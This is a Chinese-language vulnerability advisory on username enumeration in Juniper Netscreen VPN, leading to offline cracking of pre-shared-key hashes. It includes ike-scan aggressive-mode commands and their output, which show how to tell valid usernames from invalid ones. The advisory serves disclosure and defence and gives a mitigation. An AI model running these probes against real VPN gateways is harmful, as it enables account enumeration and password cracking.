[问题分析] Juniper Netscreen VPN用户名枚举漏洞

【漏洞公告】Juniper Netscreen VPN用户名枚举漏洞受影响系统：Juniper Networks ScreenOS 5.2Juniper Networks ScreenOS 5.1Juniper Networks NetScreen-IDP <= 500 3.0.1 r1Juniper Networks NetScreen-5GT 5.0描述：--------------------------------------------------------------------------------BUGTRAQ ID: 14595Netscreen是Juniper提供一系列领先的联网和安全产品之一。Juniper Netscreen集成的防火墙/VPN产品在为客户执行执行VPN安全测试时存在VPN用户名枚举漏洞，成功利用这个漏洞的攻击者可以访问VPN保护的网络资源。攻击者可以使用字典攻击判断Netscreen上有效的VPN用户名。一旦发现了用户名，攻击者就可以使用这个用户名从Netscreen获得哈希，然后离线破解判断相关的口令。<*来源：Roy Hills （Roy.Hills@nta-monitor.com） 链接：http://marc.theaimsgroup.com/?l=bugtraq&amp;m=112438068426034&w=2*>测试方法：--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！响应有效的用户名"royhills@hotmail.com"$ ike-scan -A -M --id=royhills@hotmail.com 10.0.0.1Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/)10.0.0.1 Aggressive Mode Handshake returned       HDR=(CKY-R!af4dbe2cecd5f0)       SA=(Enc=ES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=SecondsLifeDuration(800)       VIDd405f46f03b7660a23be116a1975058e69e83870000000400000403(Netscreen-05)       VIDH65617274426561745f4e6f74696679386b0100 (Heartbeat Notify)       KeyExchange(128 bytes)       Nonce(20 bytes)       ID(Type=ID_IPV4_ADDR, Value.0.0.1)       Hash(20 bytes)Ending ike-scan 1.7.7: 1 hosts scanned in 0.136 seconds (7.37 hosts/sec). 1returned handshake; 0 returned notify响应无效的用户名"invalid@hotmail.com"$ ike-scan -A -M --id=invalid@hotmail.com 10.0.0.1Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/)Ending ike-scan 1.7.7: 1 hosts scanned in 2.467 seconds (0.41 hosts/sec). 0returned handshake; 0 returned notify建议：--------------------------------------------------------------------------------临时解决方法：如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：* 使用证书认证而不是预共享密钥认证。厂商补丁：Juniper Networks----------------目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.juniper.net/